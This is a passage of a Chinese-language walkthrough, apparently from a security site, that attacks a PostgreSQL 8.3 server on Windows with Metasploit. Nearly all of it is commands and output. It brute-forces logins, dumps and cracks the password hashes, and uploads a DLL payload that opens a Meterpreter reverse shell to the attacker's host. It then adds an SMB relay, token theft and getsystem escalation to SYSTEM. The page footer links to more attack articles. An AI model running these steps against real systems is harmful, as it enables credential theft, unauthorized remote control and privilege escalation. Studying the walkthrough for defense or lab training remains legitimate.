[*] 5.5.5.3:5432 Postgres - [13/14] - Trying username:'scott' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'123456'
[-] 5.5.5.3:5432 Postgres - [13/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [14/14] - Trying username:'admin' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'123456'
[-] 5.5.5.3:5432 Postgres - [14/14] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(postgres_login) >

成功一个 果然123456

查询版本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf  auxiliary(postgres_login) > use auxiliary/scanner/postgres/postgres_version
msf  auxiliary(postgres_version) > show options 
 
Module options (auxiliary/scanner/postgres/postgres_version):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output
 
msf  auxiliary(postgres_version) >

写入IP 帐号密码 端口 你懂的

1
2
3
4
5
6
7
8
9
10
msf  auxiliary(postgres_version) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(postgres_version) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(postgres_version) > exploit 
 
[*] 5.5.5.3:5432 Postgres - Version PostgreSQL 8.3.18, compiled by Visual C++ build 1400 (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(postgres_version) >

Version PostgreSQL 8.3.18 ^_^

导出全部用户密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf  auxiliary(postgres_version) > use auxiliary/scanner/postgres/postgres_hashdump
msf  auxiliary(postgres_hashdump) > show options 
 
Module options (auxiliary/scanner/postgres/postgres_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  postgres         yes       The username to authenticate as
 
msf  auxiliary(postgres_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(postgres_hashdump) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(postgres_hashdump) > exploit 
 
[*] Query appears to have run successfully
[+] Postgres Server Hashes
======================
 
 Username  Hash
 --------  ----
 dis9team  7ca3de2618396dfaa75515c29885396e
 postgres  a3556571e93b0d20722ba62be61e8c2d
 test      5a2e54ee57e5b7273b9a8fed78c1ebd8
 
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(postgres_hashdump) >

保存到了 /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
查看一下:

1
2
3
4
5
6
brk@Dis9Team:/tmp$ cat /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
Username,Hash
"dis9team","7ca3de2618396dfaa75515c29885396e"
"postgres","a3556571e93b0d20722ba62be61e8c2d"
"test","5a2e54ee57e5b7273b9a8fed78c1ebd8"
brk@Dis9Team:/tmp$

同时已经记录在MSF数据库里面:

1
2
3
4
5
6
7
8
9
10
msf  auxiliary(postgres_hashdump) > loot 
 
Loot
====
 
host     service   type             name                             content     info             path
----     -------   ----             ----                             -------     ----             ----
5.5.5.3  postgres  postgres.hashes  5.5.5.3-5432_postgreshashes.txt  text/plain  Postgres Hashes  /home/brk/.msf4/loot/20120312070517_default_5.5.5.3_postgres.hashes_391828.txt
 
msf  auxiliary(postgres_hashdump) >

破解全部用户密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf  auxiliary(postgres_hashdump) > use auxiliary/analyze/postgres_md5_crack
msf  auxiliary(postgres_md5_crack) > show options 
 
Module options (auxiliary/analyze/postgres_md5_crack):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   Munge     false            no        Munge the Wordlist (Slower)
   Wordlist  /tmp/1.txt       no        The path to an optional Wordlist
 
msf  auxiliary(postgres_md5_crack) > set Wordlist /tmp/1.txt
Wordlist => /tmp/1.txt
msf  auxiliary(postgres_md5_crack) > exploit 
 
[*] Processing wordlist...
[*] Wordlist length: 88399
[*] Attempting to crack hash: dis9team:7ca3de2618396dfaa75515c29885396e
[+] Username: dis9team Pass: 123456
[*] Attempting to crack hash: postgres:a3556571e93b0d20722ba62be61e8c2d
[+] Username: postgres Pass: 123456
[*] Attempting to crack hash: test:5a2e54ee57e5b7273b9a8fed78c1ebd8
[+] Username: test Pass: 123456
[*] Auxiliary module execution completed
msf  auxiliary(postgres_md5_crack) > 

恩,破解出来了。。。。。。。。 数据库中的记录

1
2
3
4
5
6
7
8
9
10
11
12
13
msf  auxiliary(postgres_md5_crack) > creds 
 
Credentials
===========
 
host     port  user      pass    type      active?
----     ----  ----      ----    ----      -------
5.5.5.3  5432  dis9team  123456  password  true
5.5.5.3  5432  postgres  123456  password  true
5.5.5.3  5432  test      123456  password  true
 
[*] Found 3 credentials.
msf  auxiliary(postgres_md5_crack) >

获得系统权限

这个菜是种口味

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
msf > use exploit/windows/postgres/postgres_payload
msf  exploit(postgres_payload) > show options 
 
Module options (exploit/windows/postgres/postgres_payload):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(postgres_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(postgres_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(postgres_payload) > exploit 
 
[*] Started reverse handler on 5.5.5.1:4444
[*] Authentication successful and vulnerable version 8.3 on Windows confirmed.
[*] Uploaded Ekhazpht.dll as OID 51954 to table gclggupi(trnuqjax)
[*] Command Stager progress -   1.48% done (1499/101465 bytes)
[*] Command Stager progress -   2.95% done (2998/101465 bytes)
[*] Command Stager progress -   4.43% done (4497/101465 bytes)
[*] Command Stager progress -   5.91% done (5996/101465 bytes)
[*] Command Stager progress -   7.39% done (7495/101465 bytes)
[*] Command Stager progress -   8.86% done (8994/101465 bytes)
[*] Command Stager progress -  10.34% done (10493/101465 bytes)
[*] Command Stager progress -  11.82% done (11992/101465 bytes)
[*] Command Stager progress -  13.30% done (13491/101465 bytes)
[*] Command Stager progress -  14.77% done (14990/101465 bytes)
[*] Command Stager progress -  16.25% done (16489/101465 bytes)
[*] Command Stager progress -  17.73% done (17988/101465 bytes)
[*] Command Stager progress -  19.21% done (19487/101465 bytes)
[*] Command Stager progress -  20.68% done (20986/101465 bytes)
[*] Command Stager progress -  22.16% done (22485/101465 bytes)
[*] Command Stager progress -  23.64% done (23984/101465 bytes)
[*] Command Stager progress -  25.12% done (25483/101465 bytes)
[*] Command Stager progress -  26.59% done (26982/101465 bytes)
[*] Command Stager progress -  28.07% done (28481/101465 bytes)
[*] Command Stager progress -  29.55% done (29980/101465 bytes)
[*] Command Stager progress -  31.02% done (31479/101465 bytes)
[*] Command Stager progress -  32.50% done (32978/101465 bytes)
[*] Command Stager progress -  33.98% done (34477/101465 bytes)
[*] Command Stager progress -  35.46% done (35976/101465 bytes)
[*] Command Stager progress -  36.93% done (37475/101465 bytes)
[*] Command Stager progress -  38.41% done (38974/101465 bytes)
[*] Command Stager progress -  39.89% done (40473/101465 bytes)
[*] Command Stager progress -  41.37% done (41972/101465 bytes)
[*] Command Stager progress -  42.84% done (43471/101465 bytes)
[*] Command Stager progress -  44.32% done (44970/101465 bytes)
[*] Command Stager progress -  45.80% done (46469/101465 bytes)
[*] Command Stager progress -  47.28% done (47968/101465 bytes)
[*] Command Stager progress -  48.75% done (49467/101465 bytes)
[*] Command Stager progress -  50.23% done (50966/101465 bytes)
[*] Command Stager progress -  51.71% done (52465/101465 bytes)
[*] Command Stager progress -  53.18% done (53964/101465 bytes)
[*] Command Stager progress -  54.66% done (55463/101465 bytes)
[*] Command Stager progress -  56.14% done (56962/101465 bytes)
[*] Command Stager progress -  57.62% done (58461/101465 bytes)
[*] Command Stager progress -  59.09% done (59960/101465 bytes)
[*] Command Stager progress -  60.57% done (61459/101465 bytes)
[*] Command Stager progress -  62.05% done (62958/101465 bytes)
[*] Command Stager progress -  63.53% done (64457/101465 bytes)
[*] Command Stager progress -  65.00% done (65956/101465 bytes)
[*] Command Stager progress -  66.48% done (67455/101465 bytes)
[*] Command Stager progress -  67.96% done (68954/101465 bytes)
[*] Command Stager progress -  69.44% done (70453/101465 bytes)
[*] Command Stager progress -  70.91% done (71952/101465 bytes)
[*] Command Stager progress -  72.39% done (73451/101465 bytes)
[*] Command Stager progress -  73.87% done (74950/101465 bytes)
[*] Command Stager progress -  75.35% done (76449/101465 bytes)
[*] Command Stager progress -  76.82% done (77948/101465 bytes)
[*] Command Stager progress -  78.30% done (79447/101465 bytes)
[*] Command Stager progress -  79.78% done (80946/101465 bytes)
[*] Command Stager progress -  81.25% done (82445/101465 bytes)
[*] Command Stager progress -  82.73% done (83944/101465 bytes)
[*] Command Stager progress -  84.21% done (85443/101465 bytes)
[*] Command Stager progress -  85.69% done (86942/101465 bytes)
[*] Command Stager progress -  87.16% done (88441/101465 bytes)
[*] Command Stager progress -  88.64% done (89940/101465 bytes)
[*] Command Stager progress -  90.12% done (91439/101465 bytes)
[*] Command Stager progress -  91.60% done (92938/101465 bytes)
[*] Command Stager progress -  93.07% done (94437/101465 bytes)
[*] Command Stager progress -  94.55% done (95936/101465 bytes)
[*] Command Stager progress -  96.03% done (97435/101465 bytes)
[*] Command Stager progress -  97.51% done (98934/101465 bytes)
[*] Command Stager progress -  98.95% done (100400/101465 bytes)
[*] Command Stager progress - 100.00% done (101465/101465 bytes)

PostgreSQL SMB ATTACK

恩 首先链接数据库

1
2
3
4
5
6
7
8
brk@Dis9Team:/tmp$ psql -h 5.5.5.3 -U postgres
用户 postgres 的口令:
psql (8.4.11, 服务器 8.3.18)
警告:psql 版本8.4, 服务器版本8.3.
一些psql功能可能无法工作.
输入 "help" 来获取帮助信息.
 
postgres=#

生成smb relay

1
2
3
4
5
6
msf  exploit(smb_relay) > exploit
[*] Exploit running as background job.
 
[*] Started reverse handler on 5.5.5.1:4444
[*] Server started.
msf  exploit(smb_relay) > 

创建个表:

1
2
3
postgres=# CREATE TABLE sb(sb text);
ERROR:  relation "sb" already exists
postgres=# 

恩 我已经创建过了
读共享 获得SHELL

低权限SHELL

如果我有一个低权限SHELL,那么METASPLOIT能自动提升权限

链接SHELL

1
2
3
4
5
6
7
8
9
10
11
12
13
msf  auxiliary(browser_autopwn) > sessions 
 
Active sessions
===============
 
  Id  Type                   Information                      Connection
  --  ----                   -----------                      ----------
  1   meterpreter x86/win32  DIS9TEAM-A1\admin @ DIS9TEAM-A1  5.5.5.1:3333 -> 5.5.5.3:1155 (5.5.5.3)
 
msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > 

查看权限

1
2
3
meterpreter > getuid
Server username: DIS9TEAM-A1\admin
meterpreter >

恩 不是系统权限

权限提升

额 蓝屏了。。

不扒 咱们重新来=.=

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
meterpreter > ps
 
Process list
============
 
 PID   Name              Arch  Session  User               Path
 ---   ----              ----  -------  ----               ----
 0     [System Process]
 4     System
 112   pgagent.exe
 200   pg_ctl.exe
 264   postgres.exe
 364   SMSS.EXE
 520   httpd.exe
 588   csrss.exe
 612   winlogon.exe
 656   services.exe
 676   lsass.exe
 828   VBoxService.exe
 872   svchost.exe
 944   svchost.exe
 1040  svchost.exe
 1092  svchost.exe
 1144  postgres.exe
 1148  svchost.exe
 1224  postgres.exe
 1276  postgres.exe
 1280  postgres.exe
 1288  postgres.exe
 1300  postgres.exe
 1428  spoolsv.exe
 1692  Explorer.EXE      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\Explorer.EXE
 1796  VBoxTray.exe      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\VBoxTray.exe
 1816  ctfmon.exe        x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\ctfmon.exe
 1924  httpd.exe
 1968  mysqld.exe
 2652  alg.exe
 2836  wscntfy.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\wscntfy.exe
 2988  wuauclt.exe
 3760  iexplore.exe      x86   0        DIS9TEAM-A1\admin  C:\Program Files\Internet Explorer\iexplore.exe
 3952  notepad.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\System32\notepad.exe
meterpreter > steal_token 3760
Stolen token with username: DIS9TEAM-A1\admin
meterpreter > getsystem -h
Usage: getsystem [options]
 
Attempt to elevate your privilege to that of local system.
 
OPTIONS:
 
    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
        0 : All techniques available
        1 : Service - Named Pipe Impersonation (In Memory/Admin)
        2 : Service - Named Pipe Impersonation (Dropper/Admin)
        3 : Service - Token Duplication (In Memory/Admin)
        4 : Exploit - KiTrap0D (In Memory/User)
 
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

恩 成功了


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·检测某贵族学校
·记一次成功入侵某公司内网
·实例渗透某台湾大学全纪录
·白给你的shell(搜索引擎)
·28度的冰注入技巧(404页面妙用,s
·专业渗透人员在渗透过程中一定要
·小记一次渗透过程:一台工作站后
·Metasploit pSnuffle Packet Sni
·Web文件操作脆弱性-----下载文件
·Metasploit BackDoor For Window
·强大的嗅探工具ettercap使用教程
·PostgreSQL Database SMBRelay A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved